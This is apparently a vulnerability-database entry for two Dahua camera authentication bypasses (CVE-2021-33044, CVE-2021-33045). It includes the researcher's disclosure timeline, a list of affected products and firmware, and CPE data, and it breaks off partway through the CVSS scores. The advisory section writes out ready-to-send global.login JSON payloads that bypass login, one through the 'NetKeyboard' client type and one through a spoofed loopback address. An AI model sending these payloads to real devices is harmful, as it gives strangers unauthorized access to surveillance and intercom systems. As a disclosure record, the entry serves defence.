var-202109-1875
Vulnerability from variot

The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua Technology Multiple products offered by (CWE-287) vulnerabilities exist. In this vulnerability information, DHI-ASI7213Y-V3-T1 Based on the Information Security Early Warning Partnership, the impact on IPA Report to JPCERT/CC Coordinated with the developer. Reporter : Mitsui Bussan Secure Direction Co., Ltd.A remote third party can exploit the product by sending a specially crafted data packet. ID Authentication may be bypassed. Dahua IPC is a series of industrial computer of Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]

Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)

Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis (2021) Limited Disclosure: September 6, 2021 Full Disclosure: October 6, 2021 PoC: https://github.com/mcw0/DahuaConsole

-=[Dahua]=- Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957 Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware

-=[Timeline]=- June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com) June 17, 2021: Sent reminder to Dahua PSIRT June 18, 2021: Asked IPVM for help to get in contact with Dahua June 18, 2021: Received ACK from IPVM, told they sent note to Dahua June 19, 2021: ACK received from Dahua PSIRT, asked for additional details June 19, 2021: Additional details including PoC sent June 21, 2021: ACK received, vulnerabilites confirmed June 23, 2021: Dahua PSIRT asked for "coordinated disclosure" June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now June 24, 2021: Received CVE-2021-33044, I asked about the second CVE July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure" July 04, 2021: Confirmed "coordinated disclosure", once again July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021. "Full Disclosure" will be October 6, 2021, August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note August 30, 2021: Sent my "Limited Disclosure" note September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches September 6, 2021: Limited Disclosure October 6, 2021: Full Disclosure

-=[NetKeyboard Vulnerability]=-

CVE-2021-33044

Vulnerability: "clientType": "NetKeyboard", Vulnerable device types: IPC/VTH/VTO (tested) Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021) Protocol: DHIP and HTTP/HTTPS

Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.

Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

[Example] { "method": "global.login", "params": { "userName": "admin", "loginType": "Direct", "clientType": "NetKeyboard", "authorityType": "Default", "passwordType": "Default", "password": "Not Used" }, "id": 1, "session": 0 }

-=[Loopback Vulnerability]=-

CVE-2021-33045

Vulnerability: "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local",

Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested) Vulnerable Firmware: Firmware version older than beginning/mid 2020. Protocol: DHIP

Details: Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.

Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":}

[Example] Random MD5 with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Default", "password": "[REDACTED]" }, "id": 1, "session": 0 }

Plain text with l/p: admin/admin { "method": "global.login", "params": { "userName": "admin", "ipAddr": "127.0.0.1", "loginType": "Loopback", "clientType": "Local", "authorityType": "Default", "passwordType": "Plain", "password": "admin" }, "id": 1, "session": 0 }

[ETX]

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202109-1875",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ipc-hx5xxx",
        "scope": null,
        "trust": 1.6,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hx3xxx",
        "scope": null,
        "trust": 1.6,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hum7xxx",
        "scope": null,
        "trust": 1.6,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hum7xxx",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.820.0000000.5.r.210705"
      },
      {
        "model": "vto-75x95x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "4.300.0000003.0.r.210714"
      },
      {
        "model": "vth-542xh",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "4.500.0000002.0.r.210715"
      },
      {
        "model": "tpc-sd2221",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.630.0000000.7.r.210707"
      },
      {
        "model": "tpc-bf2221",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.630.0000000.10.r.210707"
      },
      {
        "model": "vto-65xxx",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "4.300.0000004.0.r.210715"
      },
      {
        "model": "sd1a1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.812.0000007.0.r.210706"
      },
      {
        "model": "sd6al",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.812.0000007.0.r.210706"
      },
      {
        "model": "sd50",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.812.0000007.0.r.210706"
      },
      {
        "model": "sd41",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.812.0000007.0.r.210706"
      },
      {
        "model": "tpc-bf5x21",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.630.0000000.8.r.210630"
      },
      {
        "model": "ipc-hx3xxx",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.800.0000000.29.r.210630"
      },
      {
        "model": "tpc-bf1241",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.630.0000000.6.r.210707"
      },
      {
        "model": "tpc-sd8x21",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.630.0000000.9.r.210706"
      },
      {
        "model": "sd22",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.812.0000007.0.r.210706"
      },
      {
        "model": "ipc-hx5xxx",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.820.0000000.18.r.210705"
      },
      {
        "model": "sd52c",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.812.0000007.0.r.210706"
      },
      {
        "model": "tpc-bf5x01",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.630.0000000.12.r.210707"
      },
      {
        "model": "tpc-pt8x21b",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dahuasecurity",
        "version": "2.630.0000000.10.r.210701"
      },
      {
        "model": "sd22",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "tpc-bf1241",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "sd6al",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "sd41",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "sd50",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "sd1a1",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "sd52c",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "dhi-asi7213y-v3-t1",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hx2xxx",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "thermal tpc-sd2221",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ptz dome camera sd52c",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "thermal tpc-sd8x21",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ptz dome camera sd6al",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "thermal tpc-pt8x21b",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "thermal tpc-bf2221",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ptz dome camera sd49",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ptz dome camera sd1a1",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ptz dome camera sd50",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "vth542xh",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hx8xxx",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "thermal tpc-bf5xxx",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hx5 xxx",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "thermal tpc-bf1241",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ptz dome camera sd22",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "vto65xxx",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hx1xxx",
        "scope": null,
        "trust": 0.8,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "vto75x95x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "dahua",
        "version": "build time  but  2021  year  6  versions older than month"
      },
      {
        "model": "ipc",
        "scope": null,
        "trust": 0.6,
        "vendor": "dahua",
        "version": null
      },
      {
        "model": "ipc-hx3xxx versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "hx5xxx versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "hum7xxx versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "vto75x95x versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "vto65xxx versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "vth542xh versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "ptz dome camera sd1a1 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "sd22 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "sd49 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "sd50 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "sd52c versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "sd6al versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "thermal tpc-bf1241 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "tpc-bf2221 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "tpc-sd2221 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "tpc-bf5xxx versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "tpc-sd8x21 versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      },
      {
        "model": "tpc-pt8x21b versions which build time before june",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "dahua",
        "version": "2021"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-103421"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-70816"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-012422"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2024-000007"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.820.0000000.5.r.210705",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum7xxx:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.800.0000000.29.r.210630",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx3xxx:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.820.0000000.18.r.210705",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5xxx:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.812.0000007.0.r.210706",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.812.0000007.0.r.210706",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd22:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd41_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.812.0000007.0.r.210706",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd41:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.812.0000007.0.r.210706",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.812.0000007.0.r.210706",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.812.0000007.0.r.210706",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.630.0000000.6.r.210707",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf1241:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.630.0000000.10.r.210707",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf2221:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.630.0000000.12.r.210707",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x01:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-pt8x21b_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.630.0000000.10.r.210701",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-pt8x21b:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.630.0000000.7.r.210707",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd2221:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.630.0000000.9.r.210706",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-sd8x21:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "4.300.0000004.0.r.210715",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-65xxx:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "4.300.0000003.0.r.210714",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:vto-75x95x:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "4.500.0000002.0.r.210715",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:vth-542xh:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dahuasecurity:tpc-bf5x21_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.630.0000000.8.r.210630",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dahuasecurity:tpc-bf5x21:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33044"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "bashis",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "164423"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2021-33044",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
